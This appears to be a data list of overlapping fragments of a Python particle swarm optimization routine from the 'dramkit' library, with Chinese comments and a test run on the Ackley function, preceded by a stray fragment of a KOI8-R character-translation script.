[os.path.join(directoryname, f) for f in os.listdir(directoryname)] fileList = filter(filterFunc, fileList) map(translateFile, fileList)", "unicodeToKOI8R = { \\ '&#1025;': '\\xb3', '&#1040;': '\\xe1', '&#1041;': '\\xe2', '&#1042;': '\\xf7', '&#1043;':" ]
[ "rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值", "rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况", "else: if not 0 < w_fix < 1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w =", "logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) + \\ 'best fval: {}'.format(gBestVal))", "np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest", "- https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name ==", "- pos) + c2 * r2 * (gBest - pos) vel = np.clip(vel,", "# 平均值 # 迭代寻优 for l in range(0, max_iter): # 位置过界处理 pos =", "= [-x for x in v_maxs] # 初始化 vel = np.zeros((popsize, dim)) #", "dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import plot_series, simple_logger from", "位置过界处理 pos = np.clip(pos, x_lb, x_ub) fvals_mean = 0 for i in range(0,", "= func_opter_parms.parms_opter['opter_name'] func_name = func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1)", "pos = np.clip(pos, x_lb, x_ub) fvals_mean = 0 for i in range(0, popsize):", "_ in range(dim)] else: v_maxs = [v_maxs] * dim v_mins = [-x for", "'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}} parms_opter = {'opter_name': 'pso-test', 'popsize':", "30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2,", "max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix:", "10 for _ in range(dim)] else: v_maxs = [v_maxs] * dim v_mins =", "func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub:", "pandas as pd from dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit", "= FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean':", "kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs =", "每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') # 全局最优值 pos =", "# 样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) #", "gBestVal = fval gBest = pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: #", "w_max - l * ((w_max - w_min) / max_iter) else: if not 0", "= random.random() # r2 = random.random() # # 速度更新 # vel[i, j] =", "学习因子 | parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms", "初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf'))", "func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__': import pandas as pd", "= func_opter_parms.parms_func['dim'] kwargs = func_opter_parms.parms_func['kwargs'] # 优化器参数 popsize = func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter']", "c2 * r2 * (gBest - pos) vel = np.clip(vel, v_mins, v_maxs) #", "logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals", "list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)] else:", "if vel[i, j] > v_maxs[j]: # vel[i, j] = v_maxs[j] # if vel[i,", "0 for i in range(0, popsize): fval = objf(pos[i, :], **kwargs) # 目标函数值", "x in v_maxs] # 初始化 vel = np.zeros((popsize, dim)) # 初始速度 pBestVals =", "'' or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb =", "# # 速度过界处理 # if vel[i, j] > v_maxs[j]: # vel[i, j] =", "自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法", "fval gBest = pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w", "= 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub']", "= w * vel + c1 * r1 * (pBest - pos) +", "func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix']", "func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x", "v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 |", "Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms", "= fvals_mean if nshow: if (l+1) % nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name", "np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel = w * vel", "= fval pBest[i, :] = pos[i, :].copy() # 更新全局最优解 if gBestVal > fval:", "# c2 * r2 * (gBest[j] - pos[i, j]) # # 速度过界处理 #", "w = w_fix # # 速度和位置更新 # for i in range(0, popsize): #", "function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim", "\\ # c2 * r2 * (gBest[j] - pos[i, j]) # # 速度过界处理", "j] + \\ # c1 * r1 * (pBest[i, j] - pos[i,j]) +", "时间记录 strt_tm = time.time() func_opter_parms.set_start_time(time.strftime('%Y-%m-%d %H:%M:%S')) # 边界统一为列表 if not isinstance(x_lb, list): x_lb", "fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i] = fval pBest[i,", "j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim)) # 速度更新", "'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1':", "'max_iter': 500, 'v_maxs': 5, 'w_max': 0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2':", "| x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 |", "gBestVal convergence_curve_mean[l] = fvals_mean if nshow: if (l+1) % nshow ==0: opter_name =", "10, 'dim': 10, 'kwargs': {}} parms_opter = {'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500,", "= [v_maxs] * dim v_mins = [-x for x in v_maxs] # 初始化", "as np from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms):", "fvals_mean = 0 for i in range(0, popsize): fval = objf(pos[i, :], **kwargs)", "+ c2 * r2 * (gBest - pos) vel = np.clip(vel, v_mins, v_maxs)", "# # 位置更新 # pos[i, j] = pos[i, j] + vel[i, j] #", "# if vel[i, j] > v_maxs[j]: # vel[i, j] = v_maxs[j] # if", "dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO", "from dramkit.logtools.utils_logger import close_log_file strt_tm = time.time() objf = TestFuncs.ackley parms_func = {'func_name':", "objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类, 须设置parms_func、parms_opter、parms_log | parms_func为目标函数参数信息dict,key须包含: |", "'__main__': import pandas as pd from dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo", ":].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l", "logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log = {'logger': logger, 'nshow': 10} parms_log =", "func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow", "| 默认动态更新w时采用线性递减方法 | c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 |", "> fval: pBestVals[i] = fval pBest[i, :] = pos[i, :].copy() # 更新全局最优解 if", "(pBest[i, j] - pos[i,j]) + \\ # c2 * r2 * (gBest[j] -", "= gBestVal convergence_curve_mean[l] = fvals_mean if nshow: if (l+1) % nshow ==0: opter_name", "# 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim)) # 每个个体(样本)迭代过程中的最优解 gBest =", "parms_func为目标函数参数信息dict,key须包含: | x_lb: 自变量每个维度取值下界,list或数值,为list时长度应等于dim | x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数", "* r2 * (gBest - pos) vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理", "# 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优 for l in range(0,", "[(x_ub[_]-x_lb[_]) / 10 for _ in range(dim)] else: v_maxs = [v_maxs] * dim", "更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms", "---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters ---------- objf : function 目标函数。注:须事先转化为求极小值问题 func_opter_parms : FuncOpterInfo :class:`dramkit.optimizer.utils_heuristic.FuncOpterInfo` 类,", "= np.zeros((popsize, dim)) # 初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大", "1: raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # # 速度和位置更新 # for i", "- https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name == '' or", "= fval gBest = pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新", "= func_opter_parms.parms_func['func_name'] logger.info('{} for {}, iter: {}, '.format(opter_name, func_name, l+1) + \\ 'best", "1)内!') w = w_fix # # 速度和位置更新 # for i in range(0, popsize):", "= {'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf,", "vel[i, j] # 速度和位置更新 r1 = np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim)) #", "close_log_file strt_tm = time.time() objf = TestFuncs.ackley parms_func = {'func_name': objf.__name__, 'x_lb': -10,", "isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub", "== '__main__': import pandas as pd from dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic import", "from dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import plot_series, simple_logger", "gBest = pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w =", "-10, 'x_ub': 10, 'dim': 10, 'kwargs': {}} parms_opter = {'opter_name': 'pso-test', 'popsize': 30,", "func_opter_parms.parms_opter['c2'] # 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm =", "for {}, iter: {}, '.format(opter_name, func_name, l+1) + \\ 'best fval: {}'.format(gBestVal)) #", "v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1", "dim, x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter) # 全局最优值 convergence_curve_mean", "* r1 * (pBest - pos) + c2 * r2 * (gBest -", "c1, c2: 学习因子 | parms_log: 日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns", "np from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): '''", "pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'},", "'kwargs': {}} parms_opter = {'opter_name': 'pso-test', 'popsize': 30, 'max_iter': 500, 'v_maxs': 5, 'w_max':", "# 目标函数值 fvals_mean = (fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if pBestVals[i]", "raise ValueError('固定惯性因子w范围应该在(0, 1)内!') w = w_fix # # 速度和位置更新 # for i in", "0.9, 'w_min': 0.2, 'w_fix': False, 'c1': 2, 'c2': 2} # logger = simple_logger()", "func_opter_parms.parms_opter['popsize'] max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min']", "j] = v_maxs[j] # if vel[i, j] < v_mins[j]: # vel[i, j] =", "func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2']", "参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name): opter_name = 'pso'", "TestFuncs.ackley parms_func = {'func_name': objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}}", "= TestFuncs.ackley parms_func = {'func_name': objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs':", "# 速度更新 # vel[i, j] = w * vel[i, j] + \\ #", "parms_log) func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best':", "logger, 'nshow': 10} parms_log = {'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter,", "j in range (0, dim): # r1 = random.random() # r2 = random.random()", "# 每个个体(样本)迭代过程中的最优解 gBest = np.zeros(dim) # 保存全局最优解 gBestVal = float('inf') # 全局最优值 pos", "func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__': import pandas as pd from dramkit.optimizer.base_funcs", "v_maxs[j]: # vel[i, j] = v_maxs[j] # if vel[i, j] < v_mins[j]: #", "'x_ub': 10, 'dim': 10, 'kwargs': {}} parms_opter = {'opter_name': 'pso-test', 'popsize': 30, 'max_iter':", "import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ----", "time.time() objf = TestFuncs.ackley parms_func = {'func_name': objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim':", "# 更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max - l *", "np.zeros(max_iter) # 全局最优值 convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优 for l in", "{'func_name': objf.__name__, 'x_lb': -10, 'x_ub': 10, 'dim': 10, 'kwargs': {}} parms_opter = {'opter_name':", "# r2 = random.random() # # 速度更新 # vel[i, j] = w *", "max_iter = func_opter_parms.parms_opter['max_iter'] v_maxs = func_opter_parms.parms_opter['v_maxs'] w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix", "__name__ == '__main__': import pandas as pd from dramkit.optimizer.base_funcs import TestFuncs from dramkit.optimizer.utils_heuristic", "= pos[i, :].copy() # 更新w(w为惯性因子,值越大全局寻优能力更强) if not w_fix: # w采用线型递减方式动态更新,也可采用其它方式更新 w = w_max", "更新每个个体的最优解(理解为局部最优解) if pBestVals[i] > fval: pBestVals[i] = fval pBest[i, :] = pos[i, :].copy()", "dim): # r1 = random.random() # r2 = random.random() # # 速度更新 #", "= time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__", "%H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean) func_opter_parms.set_best_val(gBestVal) func_opter_parms.set_best_x(gBest) return func_opter_parms if __name__ == '__main__': import", "10} parms_log = {'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms", "2, 'c2': 2} # logger = simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log", "return func_opter_parms if __name__ == '__main__': import pandas as pd from dramkit.optimizer.base_funcs import", "pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x =", "((w_max - w_min) / max_iter) else: if not 0 < w_fix < 1:", "| parms_opter: 优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim |", "func_opter_parms if __name__ == '__main__': import pandas as pd from dramkit.optimizer.base_funcs import TestFuncs", "w = w_max - l * ((w_max - w_min) / max_iter) else: if", "range(dim)] else: v_maxs = [v_maxs] * dim v_mins = [-x for x in", "- l * ((w_max - w_min) / max_iter) else: if not 0 <", "位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if nshow: if (l+1)", "iter: {}, '.format(opter_name, func_name, l+1) + \\ 'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm", "= opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub = func_opter_parms.parms_func['x_ub'] dim = func_opter_parms.parms_func['dim']", "若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy", "# 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean if nshow: if", "w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 | c1,", "| x_ub: 自变量每个维度取值上界,list或数值,为list时长度应等于dim | dim: 自变量维度数 | kwargs: 目标函数接收的其它参数 | parms_opter: 优化函数参数信息dict,key须包含: |", "* dim if not isinstance(x_ub, list): x_ub = [x_ub] * dim if not", "# # 速度和位置更新 # for i in range(0, popsize): # for j in", "dramkit.logtools.utils_logger import close_log_file strt_tm = time.time() objf = TestFuncs.ackley parms_func = {'func_name': objf.__name__,", "convergence_curve_mean = np.zeros(max_iter) # 平均值 # 迭代寻优 for l in range(0, max_iter): #", "in range (0, dim): # r1 = random.random() # r2 = random.random() #", "r1 = random.random() # r2 = random.random() # # 速度更新 # vel[i, j]", "for i in range(0, popsize): fval = objf(pos[i, :], **kwargs) # 目标函数值 fvals_mean", "速度更新 vel = w * vel + c1 * r1 * (pBest -", "= float('inf') # 全局最优值 pos = rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化 #", "pos + vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l] = gBestVal convergence_curve_mean[l] = fvals_mean", "# 日志参数 logger = func_opter_parms.parms_log['logger'] nshow = func_opter_parms.parms_log['nshow'] # 时间记录 strt_tm = time.time()", "r2 * (gBest[j] - pos[i, j]) # # 速度过界处理 # if vel[i, j]", "-*- import time import numpy as np from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic", "'c2': 2} # logger = simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) # parms_log =", "plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x))", "日志参数信息dict,key须包含: | logger: 日志记录器 | nshow: 若为整数,则每隔nshow轮日志输出当前最优目标函数值 Returns ------- func_opter_parms : FuncOpterInfo 更新优化过程之后的func_opter_parms", "= random.random() # # 速度更新 # vel[i, j] = w * vel[i, j]", "**kwargs) # 目标函数值 fvals_mean = (fvals_mean*i + fval) / (i+1) # 更新每个个体的最优解(理解为局部最优解) if", "fvals_mean if nshow: if (l+1) % nshow ==0: opter_name = func_opter_parms.parms_opter['opter_name'] func_name =", "from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm", "if not isinstance(x_ub, list): x_ub = [x_ub] * dim if not isinstance(v_maxs, list):", "import time import numpy as np from dramkit.gentools import isnull from dramkit.optimizer.utils_heuristic import", "import close_log_file strt_tm = time.time() objf = TestFuncs.ackley parms_func = {'func_name': objf.__name__, 'x_lb':", "初始速度 pBestVals = np.zeros(popsize) # 每个个体(样本)迭代过程中的最优值 pBestVals.fill(float('inf')) # 最小值问题初始化为正无穷大 pBest = np.zeros((popsize, dim))", "FuncOpterInfo(parms_func, parms_opter, parms_log) func_opter_parms = pso(objf, func_opter_parms) vals = pd.DataFrame({'fval_best': func_opter_parms.convergence_curve, 'fval_mean': func_opter_parms.convergence_curve_mean})", "plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm = time.time()", "{'logger': logger, 'nshow': 10} parms_log = {'logger': logger, 'nshow': 100} func_opter_parms = FuncOpterInfo(parms_func,", "isnull from dramkit.optimizer.utils_heuristic import rand_init def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO", "dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger from", "= rand_init(popsize, dim, x_lb, x_ub) # 样本(个体)随机初始化 # 保存收敛过程 convergence_curve = np.zeros(max_iter) #", "= 0 for i in range(0, popsize): fval = objf(pos[i, :], **kwargs) #", "群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值", "= np.random.random(size=(popsize, dim)) r2 = np.random.random(size=(popsize, dim)) # 速度更新 vel = w *", "def pso(objf, func_opter_parms): ''' 粒子群优化算法(Particle Swarm Optimization) PSO algorithm TODO ---- 目前仅考虑自变量连续实数情况,以后可增加自变量为离散的情况 Parameters", "w_max = func_opter_parms.parms_opter['w_max'] w_min = func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2", "= [x_ub] * dim if not isinstance(v_maxs, list): if isnull(v_maxs): v_maxs = [(x_ub[_]-x_lb[_])", "opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb = func_opter_parms.parms_func['x_lb'] x_ub =", "dramkit.logtools.logger_general import get_logger from dramkit.logtools.utils_logger import close_log_file strt_tm = time.time() objf = TestFuncs.ackley", "'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best x: {}'.format(best_x)) close_log_file(logger) print('used time:", "'fval_mean': func_opter_parms.convergence_curve_mean}) plot_series(vals, {'fval_best': '-r', 'fval_mean': '-b'}, figsize=(10, 6)) best_x = func_opter_parms.best_x func_opter_parms.parms_log['logger'].info('best", "\\ # c1 * r1 * (pBest[i, j] - pos[i,j]) + \\ #", "'best fval: {}'.format(gBestVal)) # 更新func_opter_parms end_tm = time.time() func_opter_parms.set_end_time(time.strftime('%Y-%m-%d %H:%M:%S')) func_opter_parms.set_exe_time(end_tm-strt_tm) func_opter_parms.set_convergence_curve(convergence_curve) func_opter_parms.set_convergence_curve_mean(convergence_curve_mean)", "v_mins, v_maxs) # 速度过界处理 pos = pos + vel # 位置更新 # 每轮迭代都保存最优目标值", "random.random() # # 速度更新 # vel[i, j] = w * vel[i, j] +", "'c1': 2, 'c2': 2} # logger = simple_logger() logger = get_logger('./test/log/pso_test.txt', screen_show=True) #", "# 参数提取 opter_name = func_opter_parms.parms_opter['opter_name'] if opter_name == '' or isnull(opter_name): opter_name =", "for i in range(0, popsize): # for j in range (0, dim): #", "= func_opter_parms.parms_opter['w_min'] w_fix = func_opter_parms.parms_opter['w_fix'] c1 = func_opter_parms.parms_opter['c1'] c2 = func_opter_parms.parms_opter['c2'] # 日志参数", "vel[i, j] = v_mins[j] # # 位置更新 # pos[i, j] = pos[i, j]", "| w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强 | w_min: 惯性因子最小值 | w_fix: 若w_fix设置为(0, 1)之间的值,则惯性因子w固定为w_fix,不进行动态更新 | 默认动态更新w时采用线性递减方法 |", "vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos = pos + vel #", "v_maxs) # 速度过界处理 pos = pos + vel # 位置更新 # 每轮迭代都保存最优目标值 convergence_curve[l]", "更新优化过程之后的func_opter_parms References ---------- - https://www.jianshu.com/p/8c0260c21af4 - https://github.com/7ossam81/EvoloPy ''' # 参数提取 opter_name = func_opter_parms.parms_opter['opter_name']", "v_mins[j]: # vel[i, j] = v_mins[j] # # 位置更新 # pos[i, j] =", "== '' or isnull(opter_name): opter_name = 'pso' func_opter_parms.parms_opter['opter_name'] = opter_name # 目标函数参数 x_lb", "from dramkit.optimizer.utils_heuristic import FuncOpterInfo from dramkit import plot_series, simple_logger from dramkit.logtools.logger_general import get_logger", "优化函数参数信息dict,key须包含: | popsize: 群体数量(每轮迭代的样本数量) | max_iter: 最大迭代寻优次数 | v_maxs: 自变量每个维度单次绝对变化量上界,list或数值,为list时长度应等于dim | w_max: 惯性因子w最大值,w用于平衡全局搜索和局部搜索,w值越大全局寻优能力更强", "# vel[i, j] = v_mins[j] # # 位置更新 # pos[i, j] = pos[i,", "- pos) vel = np.clip(vel, v_mins, v_maxs) # 速度过界处理 pos = pos +", ":] = pos[i, :].copy() # 更新全局最优解 if gBestVal > fval: gBestVal = fval", "fval: gBestVal = fval gBest = pos[i, :].copy() # 